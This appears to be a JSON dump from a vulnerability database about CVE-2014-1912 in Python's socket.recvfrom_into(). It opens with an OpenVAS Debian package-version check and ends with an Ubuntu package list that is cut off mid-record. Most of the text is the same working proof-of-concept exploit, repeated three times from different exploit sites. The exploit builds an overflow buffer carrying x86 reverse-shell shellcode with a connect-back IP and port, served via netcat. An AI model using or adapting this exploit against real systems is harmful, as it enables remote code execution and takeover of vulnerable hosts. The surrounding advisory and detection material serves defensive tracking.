2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 2880-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"python2.7 on Debian Linux\";\ntag_insight = \"Version 2.7 of the high-level, interactive object oriented language,\nincludes an extensive class library with lots of goodies for\nnetwork programming, system administration, sounds and graphics.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 2.7.3-6+deb7u2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.7.6-7.\n\nWe recommend that you upgrade your python2.7 packages.\";\ntag_summary = \"Multiple security issues were discovered in Python:\n\nCVE-2013-4238 \nRyan Sleevi discovered that NULL characters in the subject alternate\nnames of SSL cerficates were parsed incorrectly.\n\nCVE-2014-1912 \nRyan Smith-Roberts discovered a buffer overflow in the\nsocket.recvfrom_into() function.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702880\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2013-4238\", \"CVE-2014-1912\");\n script_name(\"Debian Security Advisory DSA 2880-1 (python2.7 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-03-17 00:00:00 +0100 (Mon, 17 Mar 2014)\");\n script_tag(name: \"cvss_base\", value:\"7.5\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2880.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"idle-python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpython2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dbg\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dev\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-doc\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-examples\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"idle-python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpython2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dbg\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dev\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-doc\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-examples\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"idle-python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpython2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dbg\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dev\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-doc\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-examples\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"idle-python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpython2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dbg\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-dev\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-doc\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-examples\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-6+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-06T11:03:52", "references": [], "description": "Proof of concept, that demonstrated the remote exploitability of this python socket flaw, if the python code uses recvfrom_into unsafelly.\r To avoid NX, ret2libc can be used thanx to", "edition": 2, "reporter": "Sha0", "published": "2014-02-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Python socket.recvfrom_into() remote buffer overflow exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "modified": "2014-02-23T00:00:00", "id": "1337DAY-ID-21938", "href": "https://0day.today/exploit/description/21938", "sourceData": "#!/usr/bin/env python\r\n\r\n'''\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n\r\n\r\n\r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n\r\nTODO: rop to evade stack nx \r\n\r\n\r\n(gdb) x/i $eip\r\n=> 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol\r\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f:\tjne 0x817bb38 -->\r\n ...\r\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] <--- eax full control again\r\n 0x817bb3e:\ttest eax,eax\r\n 0x817bb40:\tjne 0x817bb58 -->\r\n ...\r\n 0x817bb58:\tmov DWORD PTR [esp],ebx\r\n 0x817bb5b:\tcall eax <--------------------- indirect fucktion call ;)\r\n\r\n\r\n$ ./pyrecvfrominto.py \r\n\tegg file generated\r\n\r\n$ cat egg | nc -l 8080 -vv\r\n\r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n\r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=> 0x838591c:\tint3 \t\t\t<--------- LANDED!!!!!\r\n 0x838591d:\txor eax,eax\r\n 0x838591f:\txor ebx,ebx\r\n 0x8385921:\txor ecx,ecx\r\n 0x8385923:\txor edx,edx\r\n\r\n'''\r\n\r\nimport struct\r\n\r\ndef off(o):\r\n\treturn struct.pack('L',o)\r\n\r\n\r\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\r\nreversePort = '\\x7a\\x69'\r\n\r\n\r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = \"\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\"\\\r\n\t\t\t\"\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a\"\\\r\n\t\t\t\"\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\"\\\r\n\t\t\t\"\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68\"+\\\r\n\t\t\treverseIP+\"\\x66\\x68\"+reversePort+\"\\x66\\x53\\xfe\"\\\r\n\t\t\t\"\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\"\\\r\n\t\t\t\"\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe\"\\\r\n\t\t\t\"\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31\"\\\r\n\t\t\t\"\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\\\r\n\t\t\t\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\"\\\r\n\t\t\t\"\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd\"\\\r\n\t\t\t\"\\x80\"\r\n\r\n\r\nshellcode_sz = len(shellcode)\r\n\r\nprint 'shellcode sz %d' % shellcode_sz\r\n\r\n\r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n\r\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\r\n\r\n''' \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n'''\r\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n\r\n\r\nprint 'buff sz: %s' % len(buff)\r\nopen('egg','w').write(buff)\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21938"}], "exploitdb": [{"lastseen": "2016-02-03T15:41:10", "osvdbidlist": ["102929"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Python socket.recvfrom_into() - Remote Buffer Overflow. CVE-2014-1912. Remote exploit for linux platform", "reporter": "Sha0", "published": "2014-02-24T00:00:00", "type": "exploitdb", "title": "Python socket.recvfrom_into - Remote Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2014-02-24T00:00:00", "id": "EDB-ID:31875", "href": "https://www.exploit-db.com/exploits/31875/", "sourceData": "#!/usr/bin/env python\r\n\r\n'''\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n\r\n\r\n\r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n\r\nTODO: rop to evade stack nx \r\n\r\n\r\n(gdb) x/i $eip\r\n=> 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol\r\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f:\tjne 0x817bb38 -->\r\n ...\r\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] <--- eax full control again\r\n 0x817bb3e:\ttest eax,eax\r\n 0x817bb40:\tjne 0x817bb58 -->\r\n ...\r\n 0x817bb58:\tmov DWORD PTR [esp],ebx\r\n 0x817bb5b:\tcall eax <--------------------- indirect fucktion call ;)\r\n\r\n\r\n$ ./pyrecvfrominto.py \r\n\tegg file generated\r\n\r\n$ cat egg | nc -l 8080 -vv\r\n\r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n\r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=> 0x838591c:\tint3 \t\t\t<--------- LANDED!!!!!\r\n 0x838591d:\txor eax,eax\r\n 0x838591f:\txor ebx,ebx\r\n 0x8385921:\txor ecx,ecx\r\n 0x8385923:\txor edx,edx\r\n\r\n'''\r\n\r\nimport struct\r\n\r\ndef off(o):\r\n\treturn struct.pack('L',o)\r\n\r\n\r\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\r\nreversePort = '\\x7a\\x69'\r\n\r\n\r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = \"\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\"\\\r\n\t\t\t\"\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a\"\\\r\n\t\t\t\"\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\"\\\r\n\t\t\t\"\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68\"+\\\r\n\t\t\treverseIP+\"\\x66\\x68\"+reversePort+\"\\x66\\x53\\xfe\"\\\r\n\t\t\t\"\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\"\\\r\n\t\t\t\"\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe\"\\\r\n\t\t\t\"\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31\"\\\r\n\t\t\t\"\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\\\r\n\t\t\t\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\"\\\r\n\t\t\t\"\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd\"\\\r\n\t\t\t\"\\x80\"\r\n\r\n\r\nshellcode_sz = len(shellcode)\r\n\r\nprint 'shellcode sz %d' % shellcode_sz\r\n\r\n\r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n\r\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\r\n\r\n''' \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n'''\r\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n\r\n\r\nprint 'buff sz: %s' % len(buff)\r\nopen('egg','w').write(buff)\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31875/"}], "seebug": [{"lastseen": "2017-11-19T16:33:57", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "Python socket.recvfrom_into() - Remote Buffer Overflow", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85189", "id": "SSV:85189", "sourceData": "\n #!/usr/bin/env python\r\n\r\n&#39;&#39;&#39;\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n\r\n\r\n\r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n\r\nTODO: rop to evade stack nx \r\n\r\n\r\n(gdb) x/i $eip\r\n=&#62; 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] &#60;--- ebx full control =&#62; eax full conrol\r\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f:\tjne 0x817bb38 --&#62;\r\n ...\r\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] &#60;--- eax full control again\r\n 0x817bb3e:\ttest eax,eax\r\n 0x817bb40:\tjne 0x817bb58 --&#62;\r\n ...\r\n 0x817bb58:\tmov DWORD PTR [esp],ebx\r\n 0x817bb5b:\tcall eax &#60;--------------------- indirect fucktion call ;)\r\n\r\n\r\n$ ./pyrecvfrominto.py \r\n\tegg file generated\r\n\r\n$ cat egg | nc -l 8080 -vv\r\n\r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n\r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=&#62; 0x838591c:\tint3 \t\t\t&#60;--------- LANDED!!!!!\r\n 0x838591d:\txor eax,eax\r\n 0x838591f:\txor ebx,ebx\r\n 0x8385921:\txor ecx,ecx\r\n 0x8385923:\txor edx,edx\r\n\r\n&#39;&#39;&#39;\r\n\r\nimport struct\r\n\r\ndef off(o):\r\n\treturn struct.pack(&#39;L&#39;,o)\r\n\r\n\r\nreverseIP = &#39;\\xc0\\xa8\\x04\\x34&#39; #&#39;\\xc0\\xa8\\x01\\x0a&#39;\r\nreversePort = &#39;\\x7a\\x69&#39;\r\n\r\n\r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = &#34;\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2&#34;\\\r\n\t\t\t&#34;\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a&#34;\\\r\n\t\t\t&#34;\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89&#34;\\\r\n\t\t\t&#34;\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68&#34;+\\\r\n\t\t\treverseIP+&#34;\\x66\\x68&#34;+reversePort+&#34;\\x66\\x53\\xfe&#34;\\\r\n\t\t\t&#34;\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89&#34;\\\r\n\t\t\t&#34;\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe&#34;\\\r\n\t\t\t&#34;\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31&#34;\\\r\n\t\t\t&#34;\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68&#34;\\\r\n\t\t\t&#34;\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53&#34;\\\r\n\t\t\t&#34;\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd&#34;\\\r\n\t\t\t&#34;\\x80&#34;\r\n\r\n\r\nshellcode_sz = len(shellcode)\r\n\r\nprint &#39;shellcode sz %d&#39; % shellcode_sz\r\n\r\n\r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n\r\npadd = &#39;AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM&#39;\r\n\r\n&#39;&#39;&#39; \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n&#39;&#39;&#39;\r\nbuff = &#39;aaaa&#39; + off(ebx) + &#39;aaaaaAAA&#39;+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n\r\n\r\nprint &#39;buff sz: %s&#39; % len(buff)\r\nopen(&#39;egg&#39;,&#39;w&#39;).write(buff)\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85189", "status": "cve,poc"}, {"lastseen": "2017-11-19T17:31:51", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE(CAN) ID: CVE-2014-1912\r\n\r\nPython\u662f\u4e00\u79cd\u9762\u5411\u5bf9\u8c61\u3001\u76f4\u8bd1\u5f0f\u8ba1\u7b97\u673a\u7a0b\u5e8f\u8bbe\u8ba1\u8bed\u8a00\u3002\r\n\r\nPython 2.7\u7248\u672c\u7684&quot;sock_recvfrom_into()&quot;\u51fd\u6570(Modules/socketmodule.c)\u5b58\u5728\u8fb9\u754c\u9519\u8bef\uff0c\u5229\u7528\u540e\u53ef\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nPython python 2.7.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPython\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://bugs.python.org/issue20246", "reporter": "Root", "published": "2014-02-25T00:00:00", "title": "Python &quot;sock_recvfrom_into()&quot; \u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-02-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61560", "id": "SSV:61560", "sourceData": "\n #!/usr/bin/env python\r\n \r\n'''\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n \r\n \r\n \r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n \r\nTODO: rop to evade stack nx \r\n \r\n \r\n(gdb) x/i $eip\r\n=&gt; 0x817bb28: mov eax,DWORD PTR [ebx+0x4] &lt;--- ebx full control =&gt; eax full conrol\r\n 0x817bb2b: test BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f: jne 0x817bb38 --&gt;\r\n ...\r\n 0x817bb38: mov eax,DWORD PTR [eax+0xa4] &lt;--- eax full control again\r\n 0x817bb3e: test eax,eax\r\n 0x817bb40: jne 0x817bb58 --&gt;\r\n ...\r\n 0x817bb58: mov DWORD PTR [esp],ebx\r\n 0x817bb5b: call eax &lt;--------------------- indirect fucktion call ;)\r\n \r\n \r\n$ ./pyrecvfrominto.py \r\n egg file generated\r\n \r\n$ cat egg | nc -l 8080 -vv\r\n \r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n \r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=&gt; 0x838591c: int3 &lt;--------- LANDED!!!!!\r\n 0x838591d: xor eax,eax\r\n 0x838591f: xor ebx,ebx\r\n 0x8385921: xor ecx,ecx\r\n 0x8385923: xor edx,edx\r\n \r\n'''\r\n \r\nimport struct\r\n \r\ndef off(o):\r\n return struct.pack('L',o)\r\n \r\n \r\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\r\nreversePort = '\\x7a\\x69'\r\n \r\n \r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = &quot;\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2&quot;\\\r\n &quot;\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a&quot;\\\r\n &quot;\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89&quot;\\\r\n &quot;\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68&quot;+\\\r\n reverseIP+&quot;\\x66\\x68&quot;+reversePort+&quot;\\x66\\x53\\xfe&quot;\\\r\n &quot;\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89&quot;\\\r\n &quot;\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe&quot;\\\r\n &quot;\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31&quot;\\\r\n &quot;\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68&quot;\\\r\n &quot;\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53&quot;\\\r\n &quot;\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd&quot;\\\r\n &quot;\\x80&quot;\r\n \r\n \r\nshellcode_sz = len(shellcode)\r\n \r\nprint 'shellcode sz %d' % shellcode_sz\r\n \r\n \r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n \r\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\r\n \r\n''' \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n'''\r\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n \r\n \r\nprint 'buff sz: %s' % len(buff)\r\nopen('egg','w').write(buff)\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61560", "status": "poc,details"}], "ubuntu": [{"lastseen": "2018-08-31T00:08:39", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-1912"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "2.7.5-8ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.7-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "2.7.3-0ubuntu3.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "3.2.3-6ubuntu3.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.2-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "3.3.0-1ubuntu0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.3-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "2.7.5-8ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.5-1ubuntu6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.6-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": 